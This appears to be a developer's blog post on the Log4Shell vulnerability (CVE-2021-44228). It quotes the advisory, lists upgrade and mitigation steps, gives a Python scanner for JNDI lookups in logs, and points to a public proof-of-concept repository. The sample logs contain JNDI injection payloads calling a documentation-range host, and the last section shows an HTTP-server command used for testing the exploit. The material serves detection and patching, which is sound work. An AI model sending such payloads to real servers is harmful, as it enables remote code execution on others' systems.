CVE-2021-44228 Issue

I usually scroll through FB to catch up on news from the programming communities, but none of it had ever hit me directly; I didn't expect this one to land squarely on log4j2.
So I decided to take a look at what actually happened.

1. Check the official advisory first

CVE-2021-44228

logging.apache

Problem description:
Apache Log4j2 <=2.14.1 JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behavior has been disabled by default. In previous releases (>2.10) this behavior can be mitigated by setting system property “log4j2.formatMsgNoLookups” to “true” or by removing the JndiLookup class from the classpath (example: zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class). Java 8u121 (see https://www.oracle.com/java/technologies/javase/8u121-relnotes.html) protects against remote code execution by defaulting “com.sun.jndi.rmi.object.trustURLCodebase” and “com.sun.jndi.cosnaming.object.trustURLCodebase” to “false”.

2. Searching for solutions

Log4J2 Vulnerability and Spring Boot

Start with the dependencies we actually use:

  1. spring-boot-starter-log4j2
  2. log4j-jcl
  3. aliyun-log-log4j2-appender

Firefighting status:

  1. spring-boot-starter-log4j2: waiting for v2.6.2; for now, pin log4j2.version > 2.15.0 as the main fix
  2. log4j-jcl: upgrade directly to 2.15.0
  3. aliyun-log-log4j2-appender: waiting on GitHub; for now, pin log4j2.version > 2.15.0 as the main fix

    <properties>
    <log4j2.version>2.15.0</log4j2.version>
    </properties>

3. Other mitigations
  1. Add the JVM argument -Dlog4j2.formatMsgNoLookups=true
  2. Set log4j2.formatMsgNoLookups=True in the configuration
  3. Set the environment variable LOG4J_FORMAT_MSG_NO_LOOKUPS to true
  4. Remove the JndiLookup class from the jar:
    zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class
4. Attack detection

Possible attack attempts can be spotted by checking logs for strings such as "jndi:ldap://" and "jndi:rmi".
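As an added example (not part of the original post), a small Python scanner for exactly those indicators, applied to constructed nginx-style access-log lines that use RFC 5737 documentation addresses. It matches only literal lookups; nested Log4j lookups that hide the "jndi" keyword are out of scope here.

```python
import re
from typing import List, NamedTuple

# Literal JNDI lookup as it appears in a raw log line: ${...jndi:<scheme>://<host>...}
# Schemes are the ones named in the advisory (ldap, rmi) plus ldaps and dns.
JNDI_RE = re.compile(
    r"\$\{[^}]*?jndi:(?P<scheme>ldaps?|rmi|dns):/*(?P<host>[^/}:]+)",
    re.IGNORECASE,
)

# Constructed sample log (assumption: nginx combined format, documentation IPs).
SAMPLE_LOG = """\
203.0.113.10 - - [10/Dec/2021:14:02:11 +0000] "GET / HTTP/1.1" 200 612 "-" "Mozilla/5.0"
203.0.113.20 - - [10/Dec/2021:14:02:12 +0000] "GET /login HTTP/1.1" 200 1024 "-" "${jndi:ldap://198.51.100.7:1389/x}"
203.0.113.30 - - [10/Dec/2021:14:02:13 +0000] "GET /api?q=test HTTP/1.1" 200 50 "-" "curl/7.79.1"
203.0.113.40 - - [10/Dec/2021:14:02:14 +0000] "GET /?x=${JNDI:RMI://198.51.100.8:1099/y} HTTP/1.1" 400 0 "-" "-"
"""


class Hit(NamedTuple):
    line_no: int   # 1-based line number in the scanned input
    scheme: str    # lowercased JNDI scheme (ldap, ldaps, rmi, dns)
    host: str      # callback host the lookup would contact
    line: str      # the full offending log line, for triage


def find_jndi_lookups(lines: List[str]) -> List[Hit]:
    """Return every literal JNDI lookup found in the given log lines."""
    hits = []
    for n, line in enumerate(lines, start=1):
        for m in JNDI_RE.finditer(line):
            hits.append(Hit(n, m.group("scheme").lower(), m.group("host"), line.rstrip()))
    return hits


def suspect_hosts(lines: List[str]) -> List[str]:
    """Unique callback hosts seen in lookups, e.g. for blocklists or egress-firewall checks."""
    return sorted({h.host for h in find_jndi_lookups(lines)})


if __name__ == "__main__":
    for hit in find_jndi_lookups(SAMPLE_LOG.splitlines()):
        print(f"line {hit.line_no}: {hit.scheme} lookup to {hit.host}")
    print("hosts to investigate:", suspect_hosts(SAMPLE_LOG.splitlines()))
```

A hit is only evidence that a lookup string reached the logger; whether code was loaded depends on the log4j version, the JVM's trustURLCodebase settings and outbound connectivity to the host.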

5. Testing the attack

I happened to see this project on GitHub and decided to try it out:
tangxiaofeng7 - CVE-2021-44228-Apache-Log4j-Rce

python -m http.server 8888


Reference:

Log4J2 Vulnerability and Spring Boot